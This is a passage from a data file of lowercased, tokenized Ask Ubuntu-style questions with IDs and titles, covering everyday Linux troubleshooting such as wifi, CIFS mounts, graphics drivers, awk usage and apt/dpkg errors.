or reboot or suspend immediately , ignoring the management software . i figure the power button is not something you might accidentally press . is there anything in the polkit policy i can change to allow these actions if the power button was pressed , but disallow them otherwise ? the users are generally not admin accounts , so they ca n't authenticate with sudo to force a shutdown . i know i can make the power button trigger a shutdown immediately , but i still want the ubuntu menu that asks the user which action to perform ( shutdown , reboot , sleep like in the menu when it is not disabled ) and not just shutdown immediately . if not possible in polkit , is there a way to show the normal ubuntu power options menu but run it as the superuser when the power button is pressed ?
493632	automatically run a command on start up ?	i was kindly helped on this forum a few months ago to fix my wifi . only problem is i have to run the command in the terminal at the start of every session.each time i need to run- sudo modprobe -v brcmsmac how can i make this process run automatically ? many thanks !
493634	fstab cifs mount error	i 'm using ubuntu 14.04 lts x86_64 . i 'm trying to mount a windows share on boot , but occur this error message on syslog : cifs vfs : error connecting to socket . aborting operation . cifs vfs : error connecting to socket . aborting operation . cifs vfs : cifs_mount failed w/return code = -113 cifs vfs : cifs_mount failed w/return code = -113 my fstab lines : //ardo/gra /mnt/gra cifs credentials=/etc/.ardo1 , iocharset=utf8 , uid=1000 , sec=ntlm 0 0 //192.168.0.19/pro /mnt/pro cifs credentials=/root/.ardo1 , iocharset=utf8 , sec=ntlm , dir_mode=0777 , file_mode=0777 , uid=www-data , gid=users , nobrl 0 0 when i run sudo mount -a works fine . the permissions on credential file are 0600 , owner root , with user and password . i researched some forums , and try somethings like use ip , different options in fstab , i 've installed samba cifs-utils smbnetfs libpam-mount , editted /etc/nsswitch.conf and added hosts : wins , inserted ip/name in hosts , change credentials dir . but anything works .
493637	how can i recover from deleting the /usr/share/themes directory ?	i deleted the /usr/share/themes directory , how can i recover it ? is there any way to check if there is any missing file/directory in /computer directory ? this was a bad try to change gimp and inkscape themes ( `` gtkrc '' file ) . i changed all `` gtkrc '' files that i found in the system ( stupid me ... ) and now my windows and apps are distorted = (
493639	difficulty in playing music	i 'm a new ubuntu user . i 've installed ubuntu 13.10 on my desktop alongside windows 7 . when i try to play any mp3 file with parole media player ( which i believe is the default ) , it says : parole needs mpeg-1 layer 3 ( mp3 ) decoder to play this file . it can be installed automatically . then i click install and it gives error like required plug-in could not be found . even when i am connected to the internet . i read many solutions on this very forum , but none of them seemed to work . the last thing i tried was to manual download and install the mp3 plug-in package . it installed successfully , but i still ca n't play music .
493642	how to print all coloumns using awk	in awk , is there a way to print all columns ? i do not want to print them like this : printf ( $ 1 $ 2 $ 3 ... ) is there a way to print all of them ?
493644	problem installing wow with wine 1.7	i went to wine hq to get the latest release of wine , i installed the battle net launcher and nothing crashed or froze . i started to install it and everything seemed to work fine , after i check the launcher after an hour it was at the same when i started it just saying `` installing ... '' . any suggestions why it 's doing this ?
493645	installed nvidia 610 now , no menu on left	i 'd like to use mythtv so i purchased an nvidia 610 and installed in my ubuntu server tower . first boot , no issues , so i update linux while installing nvidia drivers from `` additional drivers '' . after restart , the resolution was reduced . once i log in and startx i see nothing but the blank desktop ( resolution is correct ) . no menu on left side . i can right click or use power button to shut down . what happened ? ? ?
493649	wifi keeps trying to reconnect all by itself . the tray icon animation is almost runnying nonstop	the wifi on my ubuntu 14.04 installation is very unreliable . wireless re-connections out of the blue sometimes it takes up to 15 min until a connection is established hardware hardware is a centrino wireless-n 2200 . i have turned the power management function for the wireless card off without seeing any improvements . my computer is 30 cm next to my router . another computer running debian wheezy has no problems with this wifi . : ( what else can i do ?
493651	finding where jdk path has been set in ubuntu	please help me i am not able to find out where i have set the jdk path in ubuntu 12.04 lts . i have checked /etc/profile and .bashrc files . please help me to figure it out . any help will be really appreciated . i am also a new user to ubuntu and do n't have much experience with it .
493654	change stream format of command line sp-sc ( sopcast ) utility	i am using the command line version of sopcast under ubuntu 14.04 . i am using it like sp-sc sop : //address port port . this takes the p2p stream and re-transmits it as an live asf stream . i usually open one channel with sp-sc and connect to it via vlc . i am curious if there is any command line argument to change the asf to mp4 or something that can play directly in a browser ( so this way i retransmit the p2p stream as a http mpeg4 stream to web flash player clients ) . or will i need ffmpeg to do this ( i have no idea how to real-time re-encode with ffmped , and it may also hog my cpu , as it is already being killed by the numerous p2p connections the sopcast client makes ) .
493656	shell on ubuntu touch	i want to test some c-code on nexus 7 under ubuntu touch . before installing ubuntu touch on the tablet , i have some questions : is it possible to compile ( gcc ? ) and run the code directly in the tablet in the same way as on a laptop ? is there a shell where the command-line works as on laptop or desktop computer , on ubuntu touch ?
493658	wine needs uninstall of nvidia-cuda-toolkit that i need too !	when i want to install wine , nvidia-cuda-toolkit has to be uninstalled . is it really impossible to have both ?
493660	ubuntu kernal panic libc6 screenshot attached	i was installing some packages , 'create repo ' i think . i guess this must have messed up my libc6 installation as now i am receiving a kernal panic when i restart my box . complaining about missing libc6 libraries . i 've tried a couple of guides on the internet which said to download the right libc6.deb and extract to my root directoy using a livecd but it did n't change anything . i have a livecd so can run commands from there . a screenshot of the panic can be found here http : //i.imgur.com/9ooqh11.jpg . thanks ! will
493661	is a virus scanner really needed with wine ?	i use wine for two things , playing world of warcraft and using spotify . is a virus scanner needed for me ? i tried to use clamav but i download it from the software center and it says my version is outdated , i tried to upgrade it but i do n't know how to do that . i also like to stick with the `` no virus protection needed '' that linux is known for , since i 've been a windows user for many years .
493664	touch screen clicks repeatedly on press - ca n't drag	ubuntu 12.04 lts recognizes my touchscreen correctly . tapping the screen sends the correct abs coords and btn_touch . the problem is that btn_touch is set to a 1 , then immediately set to a 0 even though my finger never leaves the screen . this means that trying to drag something causes hudnreds of `` click '' events . i 've looked through dozens of posts about evdev , xserver , xconfig , etc . how can i make btn_touch stay a `` 1 '' as long as my finger is held down ? !
493665	ubuntu 14.04 wo n't work after login	i have windows 8 installed on my computer . i followed the instructions described in this video http : //www.youtube.com/watch ? v=hoz66fc0pwu to install ubuntu 14.04 and use dual boot . the installation process went well and everything seemed to work until i typed in my login details and password . after that , the screen freezed completely and ubuntu did not work . i tried to log in as a guest , but the problem persisted . then i tried installing ubuntu on another computer i have ( on which windows 7 is running ) . again , the installation went just fine but i faced exactly the same problem ! this is how the screen looks like http : //postimg.org/image/gjf4beinv/ what could be the problem ? how can i fix it ? thank you .
493666	build a ubuntu debian package	i would like to create an ubuntu package from a single bash script i wrote . is there a simple instruction how to build an ubuntu package , that can be uploaded to launchpad ? ( i already created the ppa and uploaded my pgp- and ssh-keys ) . i already created successfully a debian package ( with packages.gz and a ppa hosted at github itself ) but that package is missing the needed files that are required in this ubuntu manual : uploading a package to a ppa : .dsc .changes .diff.gz or .debian.tar.gz and optionally the .orig.tar.gz ( if you used debuild -s -sa to build your package ) how do those files have to look like and how do i create them ? ( examples , commandline tools ? )
493667	upgrade lost all added word to spell checker dictionary all applications	upgrade from 12.04 lts to 14.04 lts on two computer running ubuntu 14.04 lts . one is a system 76 the other is an apple min mac . problem : in all application that have spell check turned on , libreoffice , several ides the spell checker lost , forgot all the words i have add in to the spell checker over the last couple of years . i think the problem is at the o. s. since all the applications broke on the upgrade to 14.04 lts on both computers at the same time . i tried checking askubuntu , google and duck duck go . what would like to know is : what is the name of the primary spell checking tool used in ubuntu ? so i can check the documentation and know the file names . where does ubuntu keep the user “dictionary” ? is their a default place where ubuntu moves files to during an upgrade ? i hope the upgrade from 12.04 lts to 14.04 lts moved the default location user “dictionary” and saved the old “dictionary” somewhere . append 07/15/14 reply to aibara iduas , when the computers where 12.04 lts their appeared to be a single dictionary for all the programs . the spell check just worked in all applications . after i upgraded to 14.04 lts , the dictionaries appeared to have been reset to zero added words . i lost all the added in words everywhere . reply to braiam . thank you for the name i will check that out . reply to bodhi.zazen . i do not think the problem is a bug because near as i can tell no one else had the same or similar problem with the upgrade . i more than likely screwed up the upgrade by forgetting to pass in a parameter and or messed up an answer during the upgrade . clarification : the upgrade to 14.04 lts caused other problems , getting the busy computer “spinner” a lot more than before , plus a few other problems . i decided to try to fix the spell checker first since i think that i might have a chance to save the old added words before trying to fix the other problems . reload all my words is a survivable problem but i like to avoid if possible . thank you for your help , mark
493675	how to install an earlier version of matplotlib ?	i have matplotlib 1.3.1 installed on my computer . however i have to run some code that runs with matplotlib 1.1.1 but not with 1.3.1 . therefore i should remove this version and installed 1.1.1 . how is this possible without breaking my python installation or anything else ? and in addition how i prevent my computer from updating this library ? i have ubuntu 14.04 64bit
493677	i am trying to save a file using the nano file editor in ubuntu [ error writing /filename : permission denied ]	using the nano text editor , i 'm trying to save and exit a file . i already have the file named . i click control+x to exit . i click y because i want to save the file , now it say file to write , ok i 'm using the default name because its already named . the problem is i get this message . [ error writing /filename : permission denied ] . what am i doing wrong ?
493678	find a word using awk	is there a way to find a specific record among the whole line ? this is my file : one two three four two three four five three four five six four five six seven five six seven eight how do i search for all lines which include two ?
493685	ethernet no longer connects , wi-fi works just fine	ubuntu 14.04 lts sony vaio vpcea36fm when i came into work today , my ethernet adapter no longer connected to the network . there was an error message that had popped in the background on my desktop , but i just clicked 'continue ' or whatever to send the feedback in ( foolishly did not copy down what it said ) . anyway , the wifi/connection symbol in the upper-right perpetually 'cycles ' if i 'm trying to connect with ethernet . i have no issue getting onto our wifi network . i tried a couple things , such as editing /etc/networkmanager/networkmanager.conf from false to true & restarting the service , different ports on my hub/switch , different cable , rebooting , etc . no dice . i deleted my ethernet adapter listings from network connections and reloaded them . i did notice that after i deleted my ethernet adapters , a new 'auto ethernet ' appeared , but that performs the same . any ideas ?
493686	ubuntu for tablets : can i have multiple apps open and running at the same time ?	i know ubuntu for tablets has side stage which allows you to have 1 phone app and 1 tablet app alongside each other , but can i run 3 different tablet apps alongside each other ? i know with android , the app is paused and/or stopped if the app is no longer the focus . i 'd like to be able to switch between 3 different apps so that none of them stop running when out of focus . this sounds possible in desktop mode ; however , it 's my understanding that this mode only works when the tablet is docked which is n't helpful .
493688	why does n't xrandr recognize my view as connected , even though it 's on ?	i have a dual screen setup via a lenovo docking station , the laptop itself has its lid shut . the two screens are mirror display , i.e . both are clearly on and working to some extent , they both display the same exact content . when i type xrandr i get the following : edp1 connected ... dp1 disconnected hdmi1 disconnected dp2 connected ... hdmi2 disconnected virtual1 disconnected so only two displays are apparently available , the edp1 is the laptop screen , the dp2 , i guess is associated with the docking station instead of individual monitors . turning off one monitor makes the whole setup go terribly wrong . i am trying to get an extended view but ca n't seem to figure out how . i 've tried installing the latest intel graphic drivers , since that 's what the machine uses , but that has n't particularly helped . is there anything else i should look into ?
493690	reset all networking files	i want to reset all my networking files to default . the files include /etc/hosts , /etc/network/interfaces , /etc/resolv.conf , and more . how can i do that without re installing ? /etc/hosts 127.0.0.1 localhost : :1 localhost /etc/resolv.conf nameserver 192.168.1.1 /etc/network/interfaces # # local loopback auto lo iface lo inet loopback auto eth0 iface eth0 inet static address 192.168.1.24 netmask 255.255.255.0 network 192.168.1.0 broadcast 192.168.1.255 gateway 192.168.1.1 iptables -l chain input ( policy accept ) target prot opt source destination chain forward ( policy accept ) target prot opt source destination chain output ( policy accept ) target prot opt source destination
493693	brightness wont change	i tried changing the brightness but it wo n't dim or brighten using keys or going under applications , it just stays the same .
493698	tray icon out of place in 14.04	the tray icon for truecrypt is out of place : all my other icons are where they should be . how can i fix this ?
493701	14.04 unable to login after security update	running ubuntu 14.04 on formerly pc system . did the security update that required a reboot ( 7/8/14 ) . did reboot , left laptop for a few minutes to give it time , and came back and logged in like normal . nothing except background image came up . prior to log in , i could see the wifi connection graphic , volume control , calendar , system gear . every thing looks normal for the non-signed in state . but when i log in , none of the commands along the top appear . none of my programs , etc . i have to use the power button to power restart system or ctrl > alt > f1 and use sudo reboot .
493705	dell vt 5470 right-click in touchpad not working	my dell vt 5470 touchpad is not working properly , it 's just the right click which has a problem . i 'm running ubuntu 14.04 desktop 64 bit . how can i fix this ?
493708	why i obtain this compile error when i try to install a software ?	i am not yet a linux guy and i am going crazy trying to install a software compiling it on ubuntu 14.04 . this are the only provided instruction to install it : debian first , make sure that the required packages for qt5 development of your distribution are installed , for debian and ubuntu these are : apt-get install qt5-default qt5-qmake qtbase5-dev-tools qttools5-dev-tools \ build-essential libboost-dev libboost-system-dev \ libboost-filesystem-dev libboost-program-options-dev libboost-thread-dev \ libssl-dev libdb++-dev then execute the following : qmake make so i have installed the dependencies using apt-get and it seems to me that i have no problem . then i perform qmake and i obtain the following output : andrea @ andrea-virtual-machine : ~/documenti/wallet/mjcoin $ sudo qmake project message : building with upnp support removed plural forms as the target language has less forms . if this sounds wrong , possibly the target language is not set or recognized . removed plural forms as the target language has less forms . if this sounds wrong , possibly the target language is not set or recognized . removed plural forms as the target language has less forms . if this sounds wrong , possibly the target language is not set or recognized . andrea @ andrea-virtual-machine : ~/documenti/wallet/mjcoin $ finally i execute the make compile command but i obtain the following error message : ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... . ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... . ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... . cd /home/andrea/documenti/wallet/mjcoin ; /bin/sh share/genbuild.sh /home/andrea/documenti/wallet/mjcoin/build/build.h g++ -c -m64 -pipe -fstack-protector-all -- param ssp-buffer-size=1 -o2 -d_reentrant -fdiagnostics-show-option -wall -wextra -wno-ignored-qualifiers -wformat -wformat-security -wno-unused-parameter -wstack-protector -fpie -dqt_gui -dboost_thread_use_lib -dboost_spirit_threadsafe -dqt_disable_deprecated_before=0 -duse_upnp=1 -dstaticlib -dhave_build_info -dlinux -dqt_no_debug -dqt_widgets_lib -dqt_gui_lib -dqt_core_lib -i/usr/lib/x86_64-linux-gnu/qt5/mkspecs/linux-g++-64 -isrc -isrc/json -isrc/qt -isrc/leveldb/include -isrc/leveldb/helpers -i/usr/include/qt5 -i/usr/include/qt5/qtwidgets -i/usr/include/qt5/qtgui -i/usr/include/qt5/qtcore -ibuild -ibuild -o build/net.o src/net.cpp src/net.cpp:19:32 : fatal error : miniupnpc/miniwget.h : file o directory non esistente # include < miniupnpc/miniwget.h > ^ compilation terminated . make : *** [ build/net.o ] errore 1 the enghlish translation of the error output is : file or directory do n't exit # include miniupnpc/miniwget.h what could be the problem ? how can i try to fix it ?
493710	wireshark on ubuntu system monitoring wifi network shows fcs errors in all frames from ap to station	i 'm running wireshark on ubuntu to analyze a wifi network consisting of one wireless station , one monitor pc running wireshark in monitor mode to monitor wifi , and a wireless router/ap communicating with the wireless station . now i 've tried this with two different routers/aps , with 3 different monitor pcs running wireshark , with both ubuntu 12.04 and 14.04 and 3 different wi-fi adapters in the monitor pc , but no matter what i do when capturing in monitor mode , wireshark shows every qos data frame from the router/ap to the wireless station being monitored as having an errored checksum . aside from the bad checksum , the header appears normal . an example of what 's in the decode that does me in is the following : fcs 0x32a42587 [ incorrect , should be 0x334ac306 ] . does anybody know why this might be happening ? has anybody else done a wifi-capture using ubuntu and wireshark and gotten a trace in monitor mode that has ( or does n't have ) fcs errors in the qos data frames from the router/ap to the station ? thanks , dave see the screenshot at : https : //onedrive.live.com/redir ? resid=69bdc460109c8be9 ! 2182 & authkey= ! abbdypbcydhnu30 & v=3 & ithint=photo % 2c.png
493714	software center does not open 12.04	when i clicked software center in the launcher , nothing happens . when i tried terminal , this is what i get . *p.s . i 'm new to ubuntu `error : root : debfileapplication import traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/__init__.py '' , line 4 , in < module > from debfile import debfileapplication , debfileopenerror file `` /usr/share/software-center/softwarecenter/db/debfile.py '' , line 21 , in < module > from apt.debfile import debpackage file `` /usr/lib/python2.7/dist-packages/apt/__init__.py '' , line 24 , in < module > from apt.package import package file `` /usr/lib/python2.7/dist-packages/apt/package.py '' , line 42 , in < module > import apt.progress.text importerror : no module named progress.text traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 140 , in < module > from softwarecenter.ui.gtk3.app import softwarecenterappgtk3 file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 50 , in < module > from softwarecenter.db.application import application file `` /usr/share/software-center/softwarecenter/db/application.py '' , line 27 , in < module > import softwarecenter.distro file `` /usr/share/software-center/softwarecenter/distro/__init__.py '' , line 194 , in < module > distro_instance = _get_distro ( ) file `` /usr/share/software-center/softwarecenter/distro/__init__.py '' , line 169 , in _get_distro module = __import__ ( distro_id , globals ( ) , locals ( ) , [ ] , -1 ) file `` /usr/share/software-center/softwarecenter/distro/ubuntu.py '' , line 25 , in < module > from apt.utils import ( get_release_filename_for_pkg , file `` /usr/lib/python2.7/dist-packages/apt/__init__.py '' , line 24 , in < module > from apt.package import package file `` /usr/lib/python2.7/dist-packages/apt/package.py '' , line 42 , in < module > import apt.progress.text importerror : no module named progress.text error in sys.excepthook : traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/apport_python_hook.py '' , line 66 , in apport_excepthook from apport.fileutils import likely_packaged , get_recent_crashes file `` /usr/lib/python2.7/dist-packages/apport/__init__.py '' , line 1 , in < module > from apport.report import report file `` /usr/lib/python2.7/dist-packages/apport/report.py '' , line 20 , in < module > import apport.fileutils file `` /usr/lib/python2.7/dist-packages/apport/fileutils.py '' , line 22 , in < module > from apport.packaging_impl import impl as packaging file `` /usr/lib/python2.7/dist-packages/apport/packaging_impl.py '' , line 20 , in < module > import apt file `` /usr/lib/python2.7/dist-packages/apt/__init__.py '' , line 24 , in < module > from apt.package import package file `` /usr/lib/python2.7/dist-packages/apt/package.py '' , line 42 , in < module > import apt.progress.text importerror : no module named progress.text original exception was : traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 140 , in < module > from softwarecenter.ui.gtk3.app import softwarecenterappgtk3 file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 50 , in < module > from softwarecenter.db.application import application file `` /usr/share/software-center/softwarecenter/db/application.py '' , line 27 , in < module > import softwarecenter.distro file `` /usr/share/software-center/softwarecenter/distro/__init__.py '' , line 194 , in < module > distro_instance = _get_distro ( ) file `` /usr/share/software-center/softwarecenter/distro/__init__.py '' , line 169 , in _get_distro module = __import__ ( distro_id , globals ( ) , locals ( ) , [ ] , -1 ) file `` /usr/share/software-center/softwarecenter/distro/ubuntu.py '' , line 25 , in < module > from apt.utils import ( get_release_filename_for_pkg , file `` /usr/lib/python2.7/dist-packages/apt/__init__.py '' , line 24 , in < module > from apt.package import package file `` /usr/lib/python2.7/dist-packages/apt/package.py '' , line 42 , in < module > import apt.progress.text importerror : no module named progress.text `
493715	raise all windows with a specific title	i 'm trying to find a way to raise all the windows that have one , specific title . for example , i have two windows named superconky ( yes , you guessed it , i 'm trying to get conky running in lubuntu ) . i have a command i got from the lxde forums : sh -c 'wmctrl -k on ; wmctrl -a superconky ; ' i use it to show the desktop , except conky . it works perfectly , but only if you have one conky . if you have two or more , you get left with one and all the others minimized . so , what should i do to raise all the windows ? thanks in advance .
493716	windows 7 not seen in booting list	i have installed ubuntu 14.04 yesterday and i marked in checkbox to keep both ubuntu and windows 7 and rebooted the system . in the booting list i cant find my windows os.can anyone help me ?
493719	how to check the speed of ram when dmidecode command is not working	output of the dmidecode command is like this . viki @ viki-pc : ~ $ sudo dmidecode -- type 17 # dmidecode 2.12 smbios 2.7 present . handle 0x0006 , dmi type 17 , 21 bytes memory device array handle : 0x0005 error information handle : not provided total width : 64 bits data width : 64 bits size : 4096 mb form factor : sodimm set : none locator : sodimm1 bank locator : bank 0 type : ddr3 type detail : unknown handle 0x0008 , dmi type 17 , 21 bytes memory device array handle : 0x0005 error information handle : not provided total width : unknown data width : unknown size : no module installed form factor : sodimm set : none locator : sodimm2 bank locator : bank 1 type : unknown type detail : unknown [ update ] and lshw -c memory command is viki @ viki-pc : ~ $ sudo lshw -c memory [ sudo ] password for viki : *-firmware description : bios vendor : american megatrends inc. physical id : 0 version : r0190e7 date : 05/07/2012 size : 64kib capacity : 3008kib capabilities : pci pnp upgrade shadowing escd cdboot bootselect socketedrom edd int9keyboard int10video acpi usb agp smartbattery biosbootspecification netboot uefi *-memory description : system memory physical id : 5 slot : system board or motherboard size : 4gib *-bank:0 description : sodimm ddr3 physical id : 0 slot : sodimm1 size : 4gib width : 64 bits *-bank:1 description : sodimm [ empty ] physical id : 1 slot : sodimm2 *-cache:0 description : l1 cache physical id : a slot : l1 cache size : 128kib capacity : 128kib capabilities : internal write-through *-cache:1 description : l2 cache physical id : b slot : l2 cache size : 512kib capacity : 512kib capabilities : internal write-through *-cache:2 description : l3 cache physical id : c slot : l3 cache size : 3mib capacity : 3mib capabilities : internal write-back basically it is supposed to give me the speed of the ram module but it is not giving the same . any other way to figure ram 's speed out ?
493721	text disappearing in scroll windows lubuntu 14.04	just installed lubuntu 14.04 on dell pentium 4 . the text in scrolling windows disappears upon opening and window . the only way to get it to appear is by using scrollbar , but if the mouse hovers over any line it quickly disappears . this is making customizing and editing impossible . this even happens in the terminal window . any suggestions to stop this problem .
493723	how to remove files in a list of paths easily ?	i have a list of lines like /usr/lib/i386-linux-gnu/libavfilter.so /usr/lib/i386-linux-gnu/libavfilter.so.3 /usr/lib/i386-linux-gnu/libavfilter.so.3.42.103 /usr/lib/i386-linux-gnu/i686/cmov/libavfilter.so /usr/lib/i386-linux-gnu/i686/cmov/libavfilter.so.3 /usr/lib/i386-linux-gnu/i686/cmov/libavfilter.so.3.42.103 /usr/local/lib/libavfilter.so /usr/local/lib/libavfilter.so.4 /usr/local/lib/libavfilter.so.4.4.100 how can i remove those files altogether instead of removing them one by one like rm /usr/lib/i386-linux-gnu/libavfilter.so rm /usr/lib/i386-linux-gnu/libavfilter.so.3 rm /usr/lib/i386-linux-gnu/libavfilter.so.3.42.103 rm /usr/lib/i386-linux-gnu/i686/cmov/libavfilter.so rm /usr/lib/i386-linux-gnu/i686/cmov/libavfilter.so.3 rm /usr/lib/i386-linux-gnu/i686/cmov/libavfilter.so.3.42.103 rm /usr/local/lib/libavfilter.so rm /usr/local/lib/libavfilter.so.4 rm /usr/local/lib/libavfilter.so.4.4.100 ? warning ! do n't apply below commands without checking output at first
493724	quiuckboot in linux	i am working on a project to reduce the boot up time & i find that u-boot loader takes much time to load so i want to directly boot from x loader so that my boot time get reduced.is there any way to directly boot from x loader ?
493725	24h time format not applied on other locations	though my time is set to 24h , the toolbar widget shows time in other locations on 12h not 24h . the discrepancy with the location configuration is pretty clear in the screenshot below : how do i fix this ?
493726	dual boot : disk changes made in ubuntu will be reverted when opened in windows	i have a dual boot system using windows and ubuntu . recently , if i make some changes in ubuntu in the disk , whenever i boot into windows all these changes in the disk is reverted . in the sense that the disk contents will remain the same as they were when i had last booted into windows . and to make things worse , if i then boot into ubuntu all the disk changes i had made before booting into windows will have dissapeared . please note that until i switch to windows my disk changes wo n't disappear , but the moment i switch to windows all the changes will go away .
493731	external monitor image freezes for no aparrent reason	i am using ubuntu 14.04 , with cinnamon environment on my laptop ( dell xps l702x ) . i have an external monitor dell monitor connected through hdmi . sometimes while i am working , the image on my external monitor freezes , and the only remedy i have found is reconnecting the hdmi cable from my laptop . does anyone else have this problem ? or know why it is doing this ?
493733	router can not see the ubuntu server virtualbox on windows 8	i have a windows 8 os on my computer with a virtualbox ubuntu server 14 . windows has access to the internet and is visible on the router as an attached device 10.0.0.x . the ubuntu server has access to the internet but is not visible on the router , and when calling ifconfig i see : 10.0.2.15 every time i restart the vm , it gets a different ip , and i would like it to be const . where do i start ? =========================================================== so they have mark this as duplicate and i can not answer with a solution , but here goes ... the main issue was the virtualbox adding a default network adapter of type nat i 'm not sure what it the purpose of it , but once i 've set the type to bridgeadapter my vm got a proper dhcp from the router , and now i can config my router to set a static ip of the vm network card mac address ! only weird thing i had to figure out , is that my router does not show the vm mac address on the attached devices list , instead it shows the real network card mac address . so do n't get confused and use the mac defined in the network adapter in your vm settings ! let me know if this helps you too .
493734	sleep mode not working on ubuntu 14.04	my asus does n't go to sleep mode if i ask it to on ubuntu 14.04 . sometimes it works after some updates , then it stops working after another update ... this is the message i get on a black screen for 3 seconds when i try to put it on sleep : '' some devices failed to suspend , or early wake event detected ''
493738	no sound in lubuntu 14.04	i installed ubuntu in laptop and audio was fine but i changed replaced unity with lubuntu and now audio is not working . can anybody help ?
493742	`` ristretto '' slideshow in fullscreen	i am using xubuntu atm and my biggest issue is , that ristretto show pictures in 100 % zoom . when i run a slideshow , i want it to expand to full screen . i can only enable that for one picture at a time , and this gets reset if i switch to antother picture .
493746	pass variables to script which called script	i have a bash script which must call another bash script which varies per-user in order to get some configuration information , like so : somescript : # ! /bin/bash $ { home } /.ssconfig echo `` hello , $ { variable } ! '' ~/.ssconfig # ! /bin/bash variable=world which , instead of giving me hello , world ! as expected , gives me hello , ! how can i pass variables up from a script to the one that called it ?
493748	`` unable to make backup link of `./usr/share/tomcat7/bin/daemon.sh ' before installing new version : operation not permitted ''	i 've ran this many times but today it seems to be failing first : sudo apt-get update that works successfully . running apt-get install fails when trying to back up the daemon.sh sudo apt-get install tomcat7 reading package lists ... done building dependency tree reading state information ... done the following new packages will be installed : authbind ca-certificates-java default-jre-headless icedtea-6-jre-cacao icedtea-6-jre-jamvm java-common libavahi-client3 libavahi-common-data libavahi-common3 libcommons-collections3-java libcommons-dbcp-java libcommons-pool-java libcups2 libecj-java libjpeg-turbo8 libjpeg8 liblcms2-2 libnspr4 libnss3 libnss3-1d libpcsclite1 libservlet3.0-java libtomcat7-java openjdk-6-jre-headless openjdk-6-jre-lib tomcat7 tomcat7-common tzdata-java the following packages will be upgraded : tzdata 1 upgraded , 28 newly installed , 0 to remove and 166 not upgraded . need to get 48.8 mb of archives . after this operation , 71.1 mb of additional disk space will be used . do you want to continue [ y/n ] ? y fetched 48.8 mb in 4s ( 10.3 mb/s ) preconfiguring packages ... selecting previously unselected package libavahi-common-data . ( reading database ... 51095 files and directories currently installed . ) unpacking libavahi-common-data ( from ... /libavahi-common-data_0.6.30-5ubuntu2.1_amd64.deb ) ... selecting previously unselected package libavahi-common3 . unpacking libavahi-common3 ( from ... /libavahi-common3_0.6.30-5ubuntu2.1_amd64.deb ) ... selecting previously unselected package libavahi-client3 . unpacking libavahi-client3 ( from ... /libavahi-client3_0.6.30-5ubuntu2.1_amd64.deb ) ... selecting previously unselected package libcups2 . unpacking libcups2 ( from ... /libcups2_1.5.3-0ubuntu8.3_amd64.deb ) ... selecting previously unselected package libjpeg-turbo8 . unpacking libjpeg-turbo8 ( from ... /libjpeg-turbo8_1.1.90+svn733-0ubuntu4.3_amd64.deb ) ... selecting previously unselected package liblcms2-2 . unpacking liblcms2-2 ( from ... /liblcms2-2_2.2+git20110628-2ubuntu3.1_amd64.deb ) ... selecting previously unselected package libnspr4 . unpacking libnspr4 ( from ... /libnspr4_4.9.5-0ubuntu0.12.04.3_amd64.deb ) ... selecting previously unselected package libnss3 . unpacking libnss3 ( from ... /libnss3_3.15.4-0ubuntu0.12.04.2_amd64.deb ) ... selecting previously unselected package libpcsclite1 . unpacking libpcsclite1 ( from ... /libpcsclite1_1.7.4-2ubuntu2_amd64.deb ) ... selecting previously unselected package openjdk-6-jre-lib . unpacking openjdk-6-jre-lib ( from ... /openjdk-6-jre-lib_6b31-1.13.3-1ubuntu1~0.12.04.2_all.deb ) ... selecting previously unselected package java-common . unpacking java-common ( from ... /java-common_0.43ubuntu2_all.deb ) ... selecting previously unselected package default-jre-headless . unpacking default-jre-headless ( from ... /default-jre-headless_1 % 3a1.6-43ubuntu2_amd64.deb ) ... selecting previously unselected package libnss3-1d . unpacking libnss3-1d ( from ... /libnss3-1d_3.15.4-0ubuntu0.12.04.2_amd64.deb ) ... selecting previously unselected package ca-certificates-java . unpacking ca-certificates-java ( from ... /ca-certificates-java_20110912ubuntu6_all.deb ) ... preparing to replace tzdata 2012b-1 ( using ... /tzdata_2014e-0ubuntu0.12.04_all.deb ) ... unpacking replacement tzdata ... processing triggers for man-db ... setting up tzdata ( 2014e-0ubuntu0.12.04 ) ... current default time zone : 'etc/utc' local time is now : wed jul 9 17:44:14 utc 2014 . universal time is now : wed jul 9 17:44:14 utc 2014 . run 'dpkg-reconfigure tzdata ' if you wish to change it . selecting previously unselected package tzdata-java . ( reading database ... 51267 files and directories currently installed . ) unpacking tzdata-java ( from ... /tzdata-java_2014e-0ubuntu0.12.04_all.deb ) ... selecting previously unselected package libjpeg8 . unpacking libjpeg8 ( from ... /libjpeg8_8c-2ubuntu7_amd64.deb ) ... selecting previously unselected package openjdk-6-jre-headless . unpacking openjdk-6-jre-headless ( from ... /openjdk-6-jre-headless_6b31-1.13.3-1ubuntu1~0.12.04.2_amd64.deb ) ... selecting previously unselected package libcommons-collections3-java . unpacking libcommons-collections3-java ( from ... /libcommons-collections3-java_3.2.1-5_all.deb ) ... selecting previously unselected package libcommons-pool-java . unpacking libcommons-pool-java ( from ... /libcommons-pool-java_1.5.6-1_all.deb ) ... selecting previously unselected package libcommons-dbcp-java . unpacking libcommons-dbcp-java ( from ... /libcommons-dbcp-java_1.4-1ubuntu1_all.deb ) ... selecting previously unselected package libecj-java . unpacking libecj-java ( from ... /libecj-java_3.5.1-3_all.deb ) ... selecting previously unselected package libservlet3.0-java . unpacking libservlet3.0-java ( from ... /libservlet3.0-java_7.0.26-1ubuntu1.2_all.deb ) ... selecting previously unselected package libtomcat7-java . unpacking libtomcat7-java ( from ... /libtomcat7-java_7.0.26-1ubuntu1.2_all.deb ) ... selecting previously unselected package tomcat7-common . unpacking tomcat7-common ( from ... /tomcat7-common_7.0.26-1ubuntu1.2_all.deb ) ... dpkg : error processing /var/cache/apt/archives/tomcat7-common_7.0.26-1ubuntu1.2_all.deb ( -- unpack ) : unable to make backup link of `./usr/share/tomcat7/bin/daemon.sh ' before installing new version : operation not permitted selecting previously unselected package tomcat7 . unpacking tomcat7 ( from ... /tomcat7_7.0.26-1ubuntu1.2_all.deb ) ... selecting previously unselected package authbind . unpacking authbind 